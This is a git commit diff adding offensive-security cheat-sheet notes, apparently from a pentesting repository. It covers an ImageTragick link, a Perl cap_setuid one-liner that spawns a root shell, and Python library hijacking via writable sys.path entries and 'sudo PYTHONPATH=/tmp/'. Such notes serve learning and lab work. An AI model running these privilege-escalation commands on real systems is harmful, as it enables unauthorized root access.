stuff

2021-10-09 01:21:51 +02:00 · 2021-10-09 01:21:51 +02:00 · d9243ba0b6
parent b65298a98c
commit d9243ba0b6
3 changed files with 31 additions and 0 deletions
--- a/exploit/imagemagick/imagetragick.md
+++ b/exploit/imagemagick/imagetragick.md
@ -0,0 +1,3 @@
+# ImageTragick
+
+* [ImageTragick Website](https://imagetragick.com)
--- a/exploit/linux/capabilities.md
+++ b/exploit/linux/capabilities.md
@ -3,6 +3,12 @@
 * [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)

 ## Usage
+* Find capabilities
 ```sh
 getcap -r  / 2>/dev/null
 ```
+
+* `cap_setuid` through `/bin/perl`
+```sh
+perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'
+```
--- a/exploit/python/lib_hijack.md
+++ b/exploit/python/lib_hijack.md
@ -0,0 +1,22 @@
+# Library Hijacking
+
+* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8)
+
+## Interpreter might be called invoking sudo 
+* Write into a library called inside the script
+
+## Path call order of packages
+* Order of paths which are invoked to find packages may be found via
+```sh
+python -c 'import sys; print("\n".join(sys.path))'
+```
+* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script.
+* The highest order is `pwd`
+
+## Redirecting PYTHONPATH 
+* `SETENV` may be set while loading script through `sudo`
+```sh
+sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 <script.py>
+```
+
+